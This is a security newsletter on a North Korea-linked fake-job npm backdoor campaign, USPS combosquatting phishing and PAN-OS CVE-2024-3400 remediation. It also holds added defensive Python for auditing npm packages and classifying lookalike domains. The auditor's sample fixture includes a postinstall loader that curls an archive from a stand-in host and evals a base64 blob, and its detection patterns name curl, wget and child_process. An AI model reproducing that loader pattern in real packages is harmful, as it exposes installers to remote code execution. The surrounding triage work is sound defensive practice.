Ankura CTIX FLASH Update – April 30, 2024 – Security



Ransomware/Malware Activity

Job-Seeking Software Developers Deceived into Downloading a Python Backdoor

Researchers are tracking a social engineering-based malware
campaign designed to deceive job-seeking software developers into
downloading a malicious Python backdoor as part of a fake interview
process. The campaign is called “DEV#POPPER”, and
researchers have speculated that North Korea may be behind its
operation. The attackers make initial contact with prospective
employees by posing as hiring managers looking to fill a developer
role. As part of the interview process, candidates are asked to
download a coding task from a GitHub repository, purportedly as a
test of technical aptitude. The zip file hosted on GitHub and
downloaded by the victim contains an npm (Node package manager)
package along with a README.md file. When the npm package is run,
an obfuscated JavaScript file executes a curl command that
downloads an archive file, which itself is an obfuscated Python
script. The obfuscated Python script is a remote access tool (RAT)
with mechanisms for persistence, command execution, FTP data
exfiltration, and keystroke logging. This campaign follows on the
heels of a similar campaign dubbed “Contagious Interview”,
during which attackers likewise posed as employers to coerce
job-seeking developers into installing the BeaverTail and
InvisibleFerret malware. Both campaigns appear to target software
developers specifically. DEV#POPPER has been linked to North Korea
because the social engineering technique of targeting job-seekers
is one the Lazarus Group has been notorious for using in its
campaigns. CTIX analysts caution those currently looking for new
jobs to do proper due diligence on prospective companies before
entering the interview process. CTIX analysts will continue to
report on new and emerging malware and associated campaigns.
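A static pre-install triage of a "take-home task" npm package, written as an added defensive example rather than anything from the article or the campaign itself. It flags the pattern the chain above relies on: a lifecycle hook that auto-runs a script, plus JavaScript that shells out to curl, evaluates decoded data, or carries a long obfuscated literal. The sample package below is constructed, not the real DEV#POPPER artifact.

```python
import json
import re

# Lifecycle hooks npm runs automatically on `npm install`; a loader that
# must execute without the candidate opening a file would sit here.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Indicators worth flagging before running an unsolicited coding task.
INDICATORS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b|https?://"),
    "shell_exec": re.compile(r"child_process|\bexec(Sync)?\(|\bspawn\("),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "long_literal": re.compile(r"['\"][A-Za-z0-9+/=\\x]{200,}['\"]"),
}

def audit_package(files: dict[str, str]) -> list[tuple[str, str]]:
    """Static triage of an npm package given as {path: content}.
    Returns (location, indicator) pairs; an empty list means nothing flagged."""
    findings = []
    pkg = json.loads(files.get("package.json", "{}"))
    for hook in LIFECYCLE:
        cmd = pkg.get("scripts", {}).get(hook)
        # Any hook that fetches from the network or runs node is suspicious
        # in a package that claims to be a plain coding exercise.
        if cmd and (INDICATORS["network_fetch"].search(cmd) or "node " in cmd):
            findings.append((f"package.json:scripts.{hook}", "auto_run_hook"))
    for path, body in files.items():
        if not path.endswith(".js"):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(body):
                findings.append((path, name))
    return findings

# Constructed sample mimicking the described chain: a postinstall hook
# launches an obfuscated loader that shells out to curl and eval()s a blob.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "coding-task",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": "const _0x1 = require('child_process');\n"
                "_0x1.exec('curl -s http://example.invalid/a.tar -o /tmp/a.tar');\n"
                "eval(Buffer.from('" + "QUJD" * 60 + "', 'base64').toString());\n",
    "README.md": "# Coding task\nRun npm install, then npm start.",
}
```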

Threat Actor Activity

Phishing Campaigns Targeting USPS Have Alarming Success Rates

A recent investigation has found an alarming rate of traffic to
domains associated with phishing campaigns targeting the United
States Postal Service (USPS), revealing that traffic to fraudulent
domains often rivals or surpasses that of the legitimate USPS
website, most notably during the holiday season. Starting from an
investigation into suspicious SMS messages, researchers uncovered a
significant number of “combosquatting” domains designed
to mimic the official USPS site, deceiving users into downloading
malware, sharing sensitive information, or, most often, making
payments to fraudulent entities for what is usually advertised as a
“redelivery” fee. The findings, covering October 2023 to
February 2024, indicate a sophisticated and wide-reaching effort by
cybercriminals to exploit the USPS brand, with malicious traffic
peaking during the November to December holiday season. This
underscores the broader risk of combosquatting campaigns that
potentially target multiple brands beyond USPS. The fake sites used
in these campaigns leveraged convincing replicas of USPS’s
website and package tracking system, with one of the malicious
domains having attracted nearly half a million queries and
multiple others surpassing 150,000. CTIX analysts encourage
consumers to exercise caution and skepticism towards unsolicited
communications about package shipments. To avoid falling victim to
these phishing attempts, it is recommended to access the official
USPS website directly for any parcel tracking needs rather than
clicking on links provided in messages, thereby safeguarding
personal and financial information from cybercriminal activity.
The USPS also has a page on its website about these phishing
campaigns explaining how to report potential fraud and avoid being
scammed. A link can be found below.
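A small triage routine for combosquatting hostnames of the kind described above, added here as an example and not taken from the researchers' tooling. It separates the brand's own domain from hostnames that embed the brand token alongside extra words, and returns those extra words (redelivery, fee, tracking) so an analyst can see the lure theme at a glance. The hostnames are constructed samples, not indicators from the article, and the eTLD+1 logic is deliberately simplified.

```python
import re

BRAND = "usps"                  # brand token the fake sites embed
LEGIT_DOMAINS = {"usps.com"}    # the brand's own registrable domain

# Constructed sample hostnames standing in for domains collected from the
# SMS lures; none are indicators from the article.
SAMPLE_HOSTNAMES = [
    "tools.usps.com",
    "usps-redelivery-fee.com",
    "usps.package-track.info",
    "uspstracking-update.net",
    "example.org",
]

def registrable_domain(hostname: str) -> str:
    """Crude eTLD+1 (last two labels). Adequate for the sample set; a real
    deployment should resolve this with the Public Suffix List."""
    labels = hostname.lower().strip(".").split(".")
    return ".".join(labels[-2:])

def classify(hostname: str) -> tuple[str, list[str]]:
    """Label a hostname 'legitimate', 'unrelated' or 'combosquat'.

    Combosquatting: the brand token appears in the hostname combined with
    extra words while the registrable domain is not the brand's own. The
    extra words are returned for analyst review."""
    host = hostname.lower().strip(".")
    if registrable_domain(host) in LEGIT_DOMAINS:
        return "legitimate", []
    if BRAND not in host:
        return "unrelated", []
    without_tld = host.rsplit(".", 1)[0]
    words = re.split(r"[.\-_]", without_tld.replace(BRAND, "-"))
    return "combosquat", [w for w in words if w]

def triage(hostnames) -> dict[str, list[str]]:
    """Map each combosquatting hostname to its extra tokens, for blocking
    or reporting to the brand's abuse channel."""
    flagged = {}
    for host in hostnames:
        verdict, words = classify(host)
        if verdict == "combosquat":
            flagged[host] = words
    return flagged
```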

Vulnerabilities

Palo Alto Networks Issues Tiered Remediation Techniques for Mitigating a Recently Patched Critical Vulnerability

Palo Alto Networks has issued remediation guidance for a
critical security vulnerability in PAN-OS that has been actively
exploited since at least March 26, 2024. The flaw, tracked as
CVE-2024-3400 (CVSS score of 10/10), allows unauthenticated remote
shell command execution on affected devices and has been patched in
various versions of PAN-OS. Named Operation MidnightEclipse, the
exploitation involves deploying a Python-based backdoor, UPSTYLE,
which executes commands taken from specially crafted requests.
Although no specific threat actor has been linked, the
sophistication suggests a state-backed group. Palo Alto Networks
outlines remediation steps for four levels of compromise. At
Level 0, where only an unsuccessful attempt is observed, a hotfix
update is required. Level 1, where vulnerability testing is evident
but no harmful commands were run, also requires a hotfix update. For
Level 2, where potential data exfiltration such as unauthorized
copying of configuration files is detected, a hotfix update and a
Private Data Reset are necessary. At Level 3, which shows
interactive malicious activity, both a hotfix update and a Factory
Reset are advised. CTIX analysts urge administrators to ensure they
have followed the guidance in the advisory linked below to prevent
future exploitation.

The content of this article is intended to provide a general
guide to the subject matter. Specialist advice should be sought
about your specific circumstances.
